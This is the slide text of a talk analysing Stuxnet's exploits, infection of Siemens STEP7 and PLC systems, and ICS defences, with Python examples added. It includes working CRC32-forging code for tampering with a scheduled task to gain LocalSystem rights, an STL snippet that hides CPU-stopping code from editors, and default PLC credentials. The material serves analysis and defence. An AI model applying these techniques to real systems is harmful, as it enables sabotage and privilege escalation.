The talk will show you the technical details of Stuxnet in their full glory and make you appreciate this work of engineering more. Based on a code-level analysis of the Stuxnet PLC payload, the presentation will explain techniques therein that can be used for industrial espionage and sabotage by copycat attackers against competitors' production facilities. Currently recommended defenses, their shortcomings and alternative approaches will also be discussed.
Bio: Felix 'FX' Lindner is founder and technical lead of the Recurity Labs GmbH consulting and research team. He is also the leader of the Phenoelit group and loves to hack pretty much everything with a CPU and some communication, preferably networked. He looks back at 15+ years of (legal) hacking with only a couple of Cisco IOS and SAP remote exploits, tools for hacking HP printers and protocol attacks lining the road.
2. About
Founder and technical lead of
Recurity Labs GmbH
Over 20 years within the computer
industry
Specialized in attack methodologies and
techniques
Published first exploits against Cisco IOS
and RIM BlackBerry
Reverse Engineer by heart
3. Agenda
Goals of attacks on ICS
Standard attack patterns
Technical review of Stuxnet
Stuxnet prerequisites
Reusable techniques and patterns
Current defense strategies
Alternative defense strategies
4. Goals of ICS Attacks
ICS attacks that were documented:
Demonstration purposes
Power grid
Chemical industry
Railroad management
Detonating a Trans-Siberian natural gas
pipeline (disputed)
Delaying a Uranium enrichment program
suspected to be used for nuclear weapons
6. Goals of ICS Attacks
Commonly suspected goals in the future:
Harming the competition
Delaying production of competing vendor
Primarily aimed at Just-in-Time suppliers
Blackmailing ICS owners
Similar to documented cases of network blackmail,
e.g. City of San Francisco vs. Terry Childs
Industrial espionage
Extraction of ICS programming in order to reverse
engineer recipes and algorithms
7. Challenges of ICS Security
Topic                     | Office IT           | Control Systems
Availability              | Planned downtimes   | 24 x 7 x 365 x forever
Anti-Virus                | Widely used         | Uncommon / impossible
Lifetime                  | 3-5 years           | Up to 20 years
Outsourcing               | Common              | Becoming common
Software patching         | Regular, scheduled  | Slow, vendor specific
Change management         | Common              | Rare
Real-time performance     | Best effort         | Critical (safety, process)
Security awareness        | Good                | Poor (physical only)
Security testing + audits | Regular, scheduled  | None
Physical security         | Difficult           | Good if local, hard if remote
Time / log correlation    | Common              | Often ignored
10. Internal Attack Patterns
Direct manipulation through means of
subverted / bribed / disgruntled employees
Removal of control system source codes from
site
Configuration of various access restrictions using
passwords not communicated
Compromise of upstream management
systems
Preferred method for people without ICS
knowledge
SAP Plant Management and similar homegrown
tools with no or very little access controls
11. External Attack Patterns
Pre-compromise of production
components
Logic bombs or intentional vulnerabilities in
components acquired by the victim
Recommending or providing software with
“side effects” to suppliers
Especially well-suited for expensive software
components
Method occasionally used within the network
community
13. External Attack Patterns (cont.)
1. Compromise workstation computer in
office network of target
2. Compromise server with control systems
connection within target office network
3. Establish Man-in-the-Middle point of
control between operator and ICS
network
4. Modify control system
15. Evolvement of Standard Patterns
Most ICS environments used to be equipment
vendor specific
In some industries, the production process is
completely dependent on the vendors
Solutions are homogeneous inside a particular process and
heterogeneous outside of it
The landscape changes rapidly
Component based procurement standardizes the
production equipment
Semi-standardized protocols are used to improve
interoperability
Wireless protocols get introduced to improve flexibility
17. Features of Stuxnet
Multiple spreading mechanisms:
CVE-2010-2568 Windows LNK Vulnerability local code
execution
CVE-2010-3888 Windows Task Scheduler local privilege
escalation
CVE-2010-2743 Windows Keyboard Layout local privilege
escalation
CVE-2010-2729 Windows Print Spooler Service remote code
execution
CVE-2008-4250 Windows Server Service RPC handling remote
code execution
Self-copying to remote network shares
Self-copying to remote Siemens WinCC servers
Infection of Siemens STEP7 project files for automatic launch
upon load
18. Features of Stuxnet (2)
Peer-to-peer updating mechanism in LANs
Contacting two predefined C&C (command and
control) servers
Windows rootkit driver covering all Windows
versions since 2000
Driver file is signed with valid Code Signing certificate
Circumvention and corruption of 10 different client
security products
Special treatment for 3 additional ones
DLL loading routine that fools behavior based
HIDS detection mechanisms
19. Features of Stuxnet (3)
Fingerprinting an industrial control process
through documented and undocumented
data structures in programmable logic
controllers (PLCs)
Backdoors all instances of Siemens WinCC
and STEP7 by patching their
communication DLL in order to hide its
presence on the PLC
Virtualizes the PLC on the PLC itself, in order
to modify input and output controls without
the legitimate code on the PLC knowing
20. CVE-2010-2568: LNK
Uses a special feature of .LNK files
Explorer needs the icon of the target of the LNK
file in order to render it
LNK uses “dynamic icons” when pointing to a
control panel entry
Dynamic icons use an alternative handling where
Explorer.exe will call the LoadLibrary API on the
destination
LoadLibrary causes the DLL’s DllMain function to
be executed during load
100% reliable code execution within the context
of the user’s Explorer.exe
21. CVE-2010-3888: Task Scheduler
Uses CRC32 compensation attack to exploit design flaw in
Task Scheduler
When creating a scheduled task, the scheduler creates an
XML file for it
The XML file contains the user the task is executed under
The XML file is writable by the user creating the task
The scheduler runs a CRC32 over it and stores the checksum in
the registry
When the execution time arrives, the CRC32 is validated against
the file
Stuxnet modifies the user context of the scheduled task and
appends bytes that compensate the CRC32, so the stored
checksum still matches the tampered file
100% reliable code execution as LocalSystem on Windows
Vista and above
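The compensation step is the part of this slide worth seeing in code, because it is what turns a checksum the scheduler trusts into no protection at all. The Python below is an added example, not Stuxnet's code and not Microsoft's task file format: the task XML is constructed, its element names are made up, and hiding the four bytes in a trailing XML comment is this example's own choice. It generalizes slightly beyond the slide: the forged bytes may be followed by a known suffix, so they need not sit at the very end of the file.

```python
"""CRC32 compensation: CRC32 is a linear checksum, not an integrity check.
Given any file and any target checksum, four chosen bytes make them agree."""
import zlib

MASK = 0xFFFFFFFF
POLY = 0xEDB88320  # reflected CRC-32 polynomial, as used by zlib

TABLE = []
for _i in range(256):
    _c = _i
    for _ in range(8):
        _c = (_c >> 1) ^ POLY if _c & 1 else _c >> 1
    TABLE.append(_c)


def crc32(data: bytes) -> int:
    return zlib.crc32(data) & MASK


def _index_for_top_byte(top: int) -> int:
    # The high byte of TABLE[i] is distinct for every i, so it identifies i.
    return next(i for i in range(256) if TABLE[i] >> 24 == top)


def _step(reg: int, byte: int) -> int:
    """Feed one byte into the raw CRC register (the table-driven update zlib uses)."""
    return TABLE[(reg ^ byte) & 0xFF] ^ (reg >> 8)


def _unstep(reg_after: int, byte: int) -> int:
    """Invert _step for a byte whose value is known."""
    idx = _index_for_top_byte(reg_after >> 24)
    upper = ((reg_after ^ TABLE[idx]) << 8) & MASK   # bits 8..31 of the old register
    return upper | ((idx ^ byte) & 0xFF)             # idx == (old ^ byte) & 0xFF


def forge_crc32(prefix: bytes, suffix: bytes, target: int) -> bytes:
    """Return 4 bytes X such that crc32(prefix + X + suffix) == target."""
    reg = crc32(prefix) ^ MASK        # raw register after the prefix
    want = target ^ MASK              # raw register required before the final XOR
    for b in reversed(suffix):        # pull the requirement back through the known suffix
        want = _unstep(want, b)
    # Walk back through the four unknown bytes. Each backward step only needs the
    # top byte of the register, which stays known even though the low bytes do not.
    indices = []
    cur = want
    for _ in range(4):
        idx = _index_for_top_byte(cur >> 24)
        indices.append(idx)
        cur = ((cur ^ TABLE[idx]) << 8) & MASK
    indices.reverse()
    out = bytearray()
    for idx in indices:               # forward again: pick the byte that selects each index
        b = (reg ^ idx) & 0xFF
        out.append(b)
        reg = _step(reg, b)
    return bytes(out)


# Constructed task definition in the spirit of the slide (not the real schema).
ORIGINAL_TASK = (b'<Task><Principal><UserId>alice</UserId>'
                 b'<RunLevel>LeastPrivilege</RunLevel></Principal>'
                 b'<Exec><Command>payload.exe</Command></Exec></Task>')
TAMPERED_BODY = (ORIGINAL_TASK.replace(b'alice', b'S-1-5-18')
                 .replace(b'LeastPrivilege', b'HighestAvailable'))


def tamper_keep_crc(original: bytes, tampered_body: bytes, max_pad: int = 4096) -> bytes:
    """Rewrite the task to run as LocalSystem while the stored CRC32 still matches.
    The 4 compensating bytes are arbitrary binary, so they go into a trailing XML
    comment and the comment is padded until they are printable and free of '-'."""
    stored = crc32(original)
    for pad in range(max_pad):
        head = tampered_body + b'<!-- ' + b' ' * pad
        x = forge_crc32(head, b' -->', stored)
        if all(0x20 <= c < 0x7F and c != 0x2D for c in x):
            return head + x + b' -->'
    raise ValueError('no parser-safe compensation found')


if __name__ == '__main__':
    forged = tamper_keep_crc(ORIGINAL_TASK, TAMPERED_BODY)
    print(hex(crc32(ORIGINAL_TASK)), hex(crc32(forged)), forged[-16:])
```

The tampered file checks out against the checksum recorded for the original. The defender's lesson is the one the slide draws: a CRC only catches accidental corruption. A file that constrains a principal must either not be writable by that principal, or be protected by a keyed MAC or a signature whose key the principal does not hold.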
22. CVE-2010-2743: Keyboard Layout
Windows XP and lower allows keyboard layouts to
be loaded from anywhere
A (not validated) index is loaded from the layout
file in Kernel mode and used as an index to a
function pointer table with 3 entries
Exploit scans the memory past the function pointer
table for DWORDs that are suitable memory
addresses in userland
When one is found (<0x80000000), allocates memory
there and triggers the vulnerability
100% reliable code execution as Kernel on
Windows XP and below
23. CVE-2010-2729: Print Spooler
Enumerates printer spool shares on the network,
connects as Guest account
Print job requests to print an EXE and MOF file,
requesting to print to file in %SYSTEM32%
When printing for Guest, spooler does not
impersonate the remote user but runs as System, so
writing to %SYSTEM32% is allowed
MOF (Managed Object Format) files are compiled scripts; one dropped
below %SYSTEM32% (the wbem\mof directory) is picked up by WMI
Windows monitors the creation, compiles the MOF file and executes
its instructions, which run the EXE file
100% reliable remote code execution as System
24. CVE-2008-4250: Server Service
Known vulnerability, found being exploited in the wild
by W32/Gimmiv.A
Interesting to note: Gimmiv.A reports installed security
products back to the C&C server
Exploits a vulnerability in the RPC path
canonicalization within the remote service
Patched since 2008 (MS08-067)
Actually turns out to be a sister vulnerability to MS06-040
Gains code execution as System
Widely used exploit in the Metasploit Framework,
including a large number of target Windows versions
and circumvention of DEP on Windows XP and 2003
Fair chance remote code execution as System
25. Special DLL Loading
Host IDS behavior monitoring usually
looks at LoadLibrary API calls
Stuxnet hooks file handling routines in
NTDLL.DLL in order to redirect them into
memory areas when special filenames are
encountered
When Stuxnet uses LoadLibrary, the
special filenames are invalid on the file
system, so HIDS will ignore the call
26. Corrupting the Watchers
Security Software  | Infected Process
KAV v1 to v7       | LSASS.EXE
KAV v8 to v9       | KAV process
McAfee             | Winlogon.exe
AntiVir            | LSASS.EXE
BitDefender        | LSASS.EXE
ETrust v5 to v6    | (fail)
ETrust (other)     | LSASS.EXE
F-Secure           | LSASS.EXE
Symantec           | LSASS.EXE
ESET NOD32         | LSASS.EXE
Trend PC-cillin    | Trend process
27. Siemens STEP7 Project Infection
Stuxnet patches the STEP7 project file handling
routines to modify any project opened in the
development or management IDE
Ignores projects older than 3.5 years
Ignores projects that appear to be examples
A specific DLL is placed in the directory “hOmSave7”
of the STEP7 project
STEP7 specific data in “Apilogtypes” is modified that
causes the DLL from “hOmSave7” to be loaded when
the project file is opened
The DLL is searched for in %SYSTEM32% and the STEP7
directories first; when not found there, it is loaded
from the project's directory
28. Siemens STEP7 Project Infection (2)
Similar to STEP7 project infections, Stuxnet
also infects MCP files, used by Siemens
WinCC
WinCC databases are accessed through a
hardcoded username/password combination for
an administrative user that cannot be changed
Stuxnet uses remote SQL commands to transfer
itself to the server and execute there
Project files (even local ones) are infected with a copy of
Stuxnet and a cabinet file stored as “GracS\cc_tlg7.sav”
Such projects, if loaded into a WinCC server
manually, may execute Stuxnet as well
29. Siemens PLC Infection
On Windows PCs with Siemens PLC software, the
DLL “s7otbxdx.dll” is replaced by a wrapper
The original version is kept for functionality
The wrapper ensures that:
When writing to the PLC, the Stuxnet PLC payload is
added in transit
When reading from the PLC, the Stuxnet PLC
payload is removed and hence hidden from view
An additional thread runs, monitoring the PLC and
verifying target properties
A second additional thread controls a Data Block on
the PLC, remotely managing its behavior
30. Siemens PLC Infection (2)
Before infecting any PLC, the injected code
on the Windows PC verifies properties
PLC CPU type 6ES7-417 or 6ES7-315-2
CP 342-5 Profibus interface module is present
At least 33 devices with Profibus identification
number 0x7050 or 0x9500 are present
Identification numbers are globally unique; they are assigned to
vendors by Profibus & Profinet International, comparable to IANA
The devices are Variable Frequency Drives (VFDs)
from Fararo Paya (Iran), and Vacon (Finland)
31. Stuxnet MC7 Payload
Three payloads are delivered with Stuxnet
Two almost identical payloads for 315-2 CPUs
Called Block A and B by Symantec
One larger payload for 417 CPUs
Called Block C by Symantec
Replacement of DP_RECV
DP_RECV is responsible for the processing of received Profibus
messages on the PLC
Original Function Code is moved and a malicious replacement is
embedded
Organizational Block (OB) 1 (cyclic execution) is patched with
call to Stuxnet MC7 payload
OB35 (timed execution) is patched with call to Stuxnet MC7
payload (watchdog function)
33. Stuxnet MC7 Payload (2)
Block A/B implement a state machine
1. Record frames via DP_RECV and monitor values of the
VFD, until enough events are recorded
2. Wait 2 hours
3. Send bursts of Profibus frames to the VFDs (Phase I)
145 or 127 frames (Vacon VFDs)
34 or 32 frames (Fararo Paya VFDs)
4. Send bursts (Phase II)
2 or 36 frames (Vacon VFDs)
23 or 27 (Fararo Paya VFDs)
5. Reset internal values and reinitialize internal structures
State 0 is the global error handler.
34. Stuxnet MC7 Payload Code
ADD_AC: // CODE XREF: S7_LV+94p
OPN DB888
L DBW10h // word 888.16
L W#16#3 // word 3
<I // ACCU2 is less than ACCU1
// 3 > 888.16
JC loc_2840 // jump if RLO=1 (DW888.16 < 3)
// (do not jump if DW888.16 is 3 or more)
TAK // exchange ACCU1 and ACCU2
L W#16#4 // ACCU1 = 4
>I // ACCU2 is greater than ACCU1
// 4 < 888.16
JC loc_2840 // jump if RLO=1 (DW888.16 > 4 )
// (do not jump if DW888.16 is 4 or less)
L DW#16#0DEADF007h
PUSH // copy ACCU1 into ACCU2
BE
loc_2840: // CODE XREF: ADD_AC+Ej
// ADD_AC+1Aj
L DW#16#0
PUSH // copy ACCU1 into ACCU2
BE
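To check what the comments on this listing claim, here is an added Python evaluator (not Siemens' STL semantics and not code from the talk) that implements only the instructions the block uses: OPN, L, TAK, PUSH, <I, >I, JC and BE, with the two-accumulator model and signed 16-bit integer comparison. It treats ACCU1 at BE as the block's result, which is what the PUSH before BE implies for the caller S7_LV; that reading is an assumption of this example.

```python
"""Minimal evaluator for the STL subset used in the ADD_AC block, so the
'3 or 4 -> 0xDEADF007, else 0' reading of the listing can be executed."""
import re
from typing import Dict

ADD_AC = """
ADD_AC:
  OPN DB888
  L DBW10h              // DB888.DBW16 (offset 10h)
  L W#16#3
  <I                    // RLO = ACCU2 < ACCU1
  JC loc_2840
  TAK
  L W#16#4
  >I                    // RLO = ACCU2 > ACCU1
  JC loc_2840
  L DW#16#0DEADF007h
  PUSH
  BE
loc_2840:
  L DW#16#0
  PUSH
  BE
"""


def _literal(tok: str) -> int:
    """Constant forms seen in the listing: W#16#3, DW#16#0DEADF007h, DW#16#0."""
    m = re.fullmatch(r'D?W#16#([0-9A-Fa-f]+)h?', tok)
    if not m:
        raise ValueError(f'unsupported literal {tok!r}')
    return int(m.group(1), 16)


def _offset(tok: str) -> int:
    """DBW10h -> 0x10; a trailing 'h' marks hex, otherwise decimal."""
    return int(tok[:-1], 16) if tok.endswith('h') else int(tok)


def _int16(v: int) -> int:
    v &= 0xFFFF
    return v - 0x10000 if v & 0x8000 else v


def parse(listing: str):
    """Return (labels -> instruction index, [(mnemonic, operand)])."""
    labels, prog = {}, []
    for raw in listing.splitlines():
        line = raw.split('//', 1)[0].strip()
        if not line:
            continue
        if line.endswith(':'):
            labels[line[:-1]] = len(prog)
            continue
        parts = line.split(None, 1)
        prog.append((parts[0], parts[1].strip() if len(parts) > 1 else ''))
    return labels, prog


def run(listing: str, data_blocks: Dict[int, Dict[int, int]]) -> int:
    """Execute until BE; data_blocks maps DB number -> {byte offset: 16-bit word}."""
    labels, prog = parse(listing)
    accu1 = accu2 = rlo = 0
    db, pc = None, 0
    while pc < len(prog):
        op, arg = prog[pc]
        pc += 1
        if op == 'OPN':
            db = data_blocks[int(arg[2:])]
        elif op == 'L':                         # a load shifts ACCU1 into ACCU2
            accu2 = accu1
            accu1 = db[_offset(arg[3:])] & 0xFFFF if arg.startswith('DBW') else _literal(arg) & 0xFFFFFFFF
        elif op == 'TAK':
            accu1, accu2 = accu2, accu1
        elif op == 'PUSH':
            accu2 = accu1
        elif op == '<I':
            rlo = int(_int16(accu2) < _int16(accu1))
        elif op == '>I':
            rlo = int(_int16(accu2) > _int16(accu1))
        elif op == 'JC':
            if rlo:
                pc = labels[arg]
        elif op == 'BE':
            return accu1
        else:
            raise ValueError(f'unsupported instruction {op}')
    raise RuntimeError('fell off the end of the block')


def add_ac_result(dbw16: int) -> int:
    """Run ADD_AC with DB888.DBW16 set to the given value."""
    return run(ADD_AC, {888: {0x10: dbw16}})


if __name__ == '__main__':
    for v in (2, 3, 4, 5, 0xFFFF):
        print(v, hex(add_ac_result(v)))
```

Only the values 3 and 4 in DB888.DBW16 produce the 0xDEADF007 marker; everything else, including negative words, falls through to 0. That matches the comments on the listing and shows the idiom: two compares with a TAK between them implement a range check on a single accumulator value.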
35. Timing of the MC7 Payload
Recording takes place for 13 days
Wait 2 hours (fixed)
Pause after first burst is 27 days
Pause after second burst is 27 days
67 days for one cycle of attack
Wearing out was the goal, not destruction
The product of the attacked process was the
target, not the production equipment
36. PLC Virtualization / Decoupling
PLCs, including Siemens S7, execute in cycles
Read all input signals and set input table
Execute OB1
Write all output Bits to output table and generate signals
Stuxnet disables the automatic update of the Process
Image Input and Output Table
Essentially decoupling the entire PLC from its sensor
array, virtualizing it
Allows the Stuxnet payload to modify input and output Bits
(corresponding to signals) so the original code doesn’t
notice any changes
No explicit operator spoofing required! This method
may even fool people manually debugging the PLC.
37. PLC Input / Output Decoupling
L LW0
BLD +7
= L 14h.0
L B#16#0
T LB15h
UC SFC1Ah // SFC 26 (UPDAT_PI): update process image input table
JU loc_24
(arg) P# L 15h.0
(arg) P# L 0.0
(arg) P# L 0.0
loc_24:
BLD +8
BLD +7
= L 14h.0
L B#16#0
T LB15h
UC SFC1Bh // SFC 27 (UPDAT_PO): update process image output table
JU loc_46
(arg) P# L 15h.0
(arg) P# L 0.0
(arg) P# L 0.0
loc_46:
BLD +8
T LW0
38. BLD: A Trick Not Used
STEP7 engineers frequently use a simple trick to hide code
The BLD instruction is used as a marker around blocks of
code
The instruction has no effect on the PLC, but is interpreted by
the Siemens editors. Known combinations are:
BLD 1 / 2 (FC with parameters)
BLD 3 / 4 (FB with parameters)
BLD 7 / 8
BLD 14 / 15 (FC without parameters)
BLD 103 / 104
BLD 130 / 131 / 132 / 133 / 255
The STUXNET code does not make use of this trick
It actually keeps the original BLD instructions, wasting space
and simplifying analysis using Siemens tools
39. BLD Hiding
BLD +7
A "Always ON" // When being nasty, use this snippet
JC Run
UC SFC 46 // Stops the CPU
Run: NOP 0
... your code
... CC or UC of your FC's
BLD +8
Call SFC46
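As an added example (not a Siemens tool and not code from the talk), the following Python lists what sits between BLD +7 and BLD +8 markers in an STL export and flags regions that do not look like the straight-line call glue the editor itself generates. Both listings are constructed: BENIGN_CALL mirrors the shape of the call sequence on slide 37, HIDDEN_FC applies the trick above with a made-up body (block number 250 and the memory word are arbitrary). The "call glue" rule is this example's heuristic, not a Siemens definition of what BLD means.

```python
"""Audit STL text for code tucked between BLD +7 / BLD +8 markers, which the
Siemens editor collapses into a single CALL line."""
import re
from typing import Iterator, List, Optional, Tuple

Instr = Tuple[str, str]  # (mnemonic, operand text)

BENIGN_CALL = """
BLD +7
= L 14.0
L B#16#0
T LB 15
UC SFC 26            // UPDAT_PI
JU loc_24
(arg) P# L 15.0
loc_24:
BLD +8
"""

HIDDEN_FC = """
BLD +7
A "Always ON"        // always-true bit, so the STP below is never reached
JC Run
UC SFC 46            // STP: would stop the CPU
Run: NOP 0
L DB888.DBW 16       // constructed payload body
T MW 10
UC FC 250            // constructed block number
BLD +8
CALL SFC 46
"""

# Straight-line parameter setup around one call is what the editor emits itself.
# Anything else inside the markers is treated as a red flag (this example's rule).
CALL_GLUE = {'=', 'L', 'T', 'UC', 'CC', 'CALL', 'JU', '(arg)', 'NOP'}


def instructions(listing: str) -> Iterator[Tuple[Optional[str], Optional[str], str]]:
    """Yield (label, mnemonic, operand) per line, comments stripped."""
    for raw in listing.splitlines():
        line = raw.split('//', 1)[0].strip()
        if not line:
            continue
        label = None
        m = re.match(r'^(\w+):\s*(.*)$', line)
        if m:
            label, line = m.group(1), m.group(2).strip()
        if not line:                      # label-only line
            yield label, None, ''
            continue
        parts = line.split(None, 1)
        yield label, parts[0], parts[1] if len(parts) > 1 else ''


def bld_regions(listing: str) -> List[List[Instr]]:
    """Instruction lists enclosed by BLD +7 ... BLD +8."""
    regions: List[List[Instr]] = []
    current: Optional[List[Instr]] = None
    for _label, op, arg in instructions(listing):
        if op == 'BLD' and arg.lstrip('+') == '7':
            current = []
        elif op == 'BLD' and arg.lstrip('+') == '8':
            if current is not None:
                regions.append(current)
            current = None
        elif current is not None and op is not None:
            current.append((op, arg))
    return regions


def suspicious(region: List[Instr]) -> bool:
    """More than one call, or any bit logic / conditional jump, inside the markers."""
    calls = sum(1 for op, _ in region if op in ('UC', 'CC', 'CALL'))
    foreign = [op for op, _ in region if op not in CALL_GLUE]
    return calls > 1 or bool(foreign)


def audit(listing: str) -> List[Tuple[int, bool, List[str]]]:
    """One entry per hidden region: (index, flagged, mnemonics inside)."""
    return [(i, suspicious(r), [op for op, _ in r])
            for i, r in enumerate(bld_regions(listing))]


if __name__ == '__main__':
    print('benign:', audit(BENIGN_CALL))
    print('hidden:', audit(HIDDEN_FC))
```

The point is not the heuristic but where it runs: on the raw STL or MC7 pulled from the controller, never on what the editor displays. An auditor who only looks at the rendered CALL lines sees exactly what the author of a hidden block wants them to see.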
41. How Much Was Required?
Attack Capability                 | Required for Targeted Attack?
CVE-2010-2568 LNK                 | No
CVE-2010-3888 Task Scheduler      | No
CVE-2010-2743 Keyboard Layout     | No
CVE-2010-2729 Print Spooler       | No
CVE-2008-4250 Server Service RPC  | No
Self-copying to network share     | No
Peer-to-peer updating             | No
C&C servers                       | No
Windows rootkit & certificates    | No
10 AV product circumventions      | No
Behavioral detection evasion      | No
42. How Much Was Required?
Attack Capability                 | Required for Targeted Attack?
Self-copying to WinCC             | Optional
STEP7 project file infection      | Yes
ICS process fingerprinting        | Yes
STEP7 DLL backdoor                | Optional
PLC virtualization                | Yes
43. Relevant Techniques
Most of Stuxnet’s functionality is spreading,
survival and persistence oriented
The measures taken are extreme
Targeted attacks on an industrial process only
need a few key technologies
If the infection can be accomplished by human
means, only the PLC payload stays relevant
Stuxnet demonstrates how it is done
There is still significant room for advancements,
considering the complexity of Siemens S7
Similar attacks are very likely to be possible with any
other PLC vendor’s equipment
44. Only In Siemens-Land
Dillon Beresford showed another way at
BlackHat USA 2011:
Username: basisk
Password: basisk
A compromised OS below the MC7 layer is obviously a
game-over scenario for any security within the PLC network.
46. Current Defenses
Siemens still postulates it’s the customer’s job to secure its
automation process
Code execution upon STEP7 project loading not considered a
vulnerability. No fix.
Code execution through fixed passwords on WinCC servers not
fixed. The password is publicly known since 2008.
At least the fixed username and password in the PLC OS have
supposedly been removed since 2009
Air gaps? Don’t help, don’t exist.
Infected consultants and service engineers
Process performance dashboards for management
Agile production environments in supplier fabs
Virus scanners?
Have not protected anything since 1970.
47. Future Defenses
Frequent reprogramming of the entire automation
environment
Proposed by process engineers
May actually be the best option today
Langner Controller Integrity Checker (CIC)
Developed as response to Stuxnet
Promising first attempt on solving some of the problems
Evasion obviously possible, as it suffers from the detection
paradigm (AV software) problem
Siemens specific, doesn’t help with other automation
environments
Both don’t help when the underlying OS is infected
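Slide 29 (the read path of the wrapped DLL strips the payload) and the last point above (a checker cannot help when the host it runs on is infected) are two sides of the same fact, so one added example covers both. The model below is constructed Python, not Langner's CIC and not Stuxnet: block names other than OB1, OB35, DP_RECV and DB888 and all block contents are made up, the "patch" is a prepended marker string, and the fingerprint is a plain SHA-256 of each block body.

```python
"""A view-hiding PLC driver wrapper and a block-level integrity check run
against it from two vantage points. Block contents are constructed, not MC7."""
import hashlib
from typing import Dict, List

Blocks = Dict[str, bytes]

CLEAN_PLC: Blocks = {
    'OB1': b'CALL FC_MAIN; BE',
    'OB35': b'CALL FC_WATCHDOG; BE',
    'DP_RECV': b'original profibus receive handler',
}
MARK = b'CALL STUXNET; '            # hypothetical patch prepended to OB1/OB35
MOVED_DP_RECV = 'FC_ORIG_DP_RECV'   # hypothetical name the original is moved to
PAYLOAD_DB = 'DB888'


class Plc:
    """The controller itself: what a reader on a trusted path sees."""
    def __init__(self, blocks: Blocks):
        self.blocks = dict(blocks)

    def read_all(self) -> Blocks:
        return dict(self.blocks)

    def write_all(self, blocks: Blocks) -> None:
        self.blocks = dict(blocks)


class HidingWrapper:
    """Sits where the wrapped communication DLL does, between tool and PLC."""
    def __init__(self, plc: Plc):
        self.plc = plc

    def write_all(self, blocks: Blocks) -> None:
        infected = dict(blocks)
        infected[MOVED_DP_RECV] = blocks['DP_RECV']        # keep the original around
        infected['DP_RECV'] = b'EVIL MC7; CALL ' + MOVED_DP_RECV.encode()
        infected['OB1'] = MARK + blocks['OB1']
        infected['OB35'] = MARK + blocks['OB35']
        infected[PAYLOAD_DB] = bytes(32)
        self.plc.write_all(infected)

    def read_all(self) -> Blocks:
        seen = self.plc.read_all()
        if MOVED_DP_RECV in seen:                          # undo the swap on the way out
            seen['DP_RECV'] = seen.pop(MOVED_DP_RECV)
        seen.pop(PAYLOAD_DB, None)
        for ob in ('OB1', 'OB35'):
            if seen[ob].startswith(MARK):
                seen[ob] = seen[ob][len(MARK):]
        return seen


def fingerprint(blocks: Blocks) -> Dict[str, str]:
    return {name: hashlib.sha256(code).hexdigest() for name, code in blocks.items()}


def integrity_check(baseline: Dict[str, str], current: Dict[str, str]) -> List[str]:
    """Compare a fresh read against the baseline; returns human-readable findings."""
    findings = []
    for name in sorted(set(baseline) | set(current)):
        if name not in current:
            findings.append(f'missing block {name}')
        elif name not in baseline:
            findings.append(f'unknown block {name}')
        elif baseline[name] != current[name]:
            findings.append(f'modified block {name}')
    return findings


def demo():
    plc = Plc(CLEAN_PLC)
    baseline = fingerprint(plc.read_all())     # taken while everything was clean
    wrapper = HidingWrapper(plc)
    wrapper.write_all(CLEAN_PLC)               # engineer downloads the unchanged project
    via_infected_host = integrity_check(baseline, fingerprint(wrapper.read_all()))
    via_trusted_path = integrity_check(baseline, fingerprint(plc.read_all()))
    return via_infected_host, via_trusted_path


if __name__ == '__main__':
    hidden, real = demo()
    print('checker on the infected engineering PC:', hidden or 'no findings')
    print('checker reading the PLC directly:', real)
```

The same baseline and the same comparison give "no findings" through the wrapper and five findings through a direct read. Any controller integrity check therefore needs its own path to the PLC (a separate, hardened host or a reader booted from clean media) and its own protocol stack; run on the engineering workstation through the vendor DLL, it inherits the attacker's view.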
48. Future Defenses
Future defenses can only get developed with a better
understanding of the offense
Stuxnet targets a very specific environment
Currently flourishing research is completely utility centric
(power, water, waste, railway)
Industrial Control Systems are extremely environment
specific by nature
The best protection is to evaluate your own
environment’s vulnerability
Based on a solid threat model, developed around your
business and your likely adversaries
The only approach that has been shown to work in other
emerging threat areas before
49. Thank You!
Felix ´FX´ Lindner
Head
fx@recurity-labs.com
Recurity Labs GmbH, Berlin, Germany
http://www.recurity-labs.com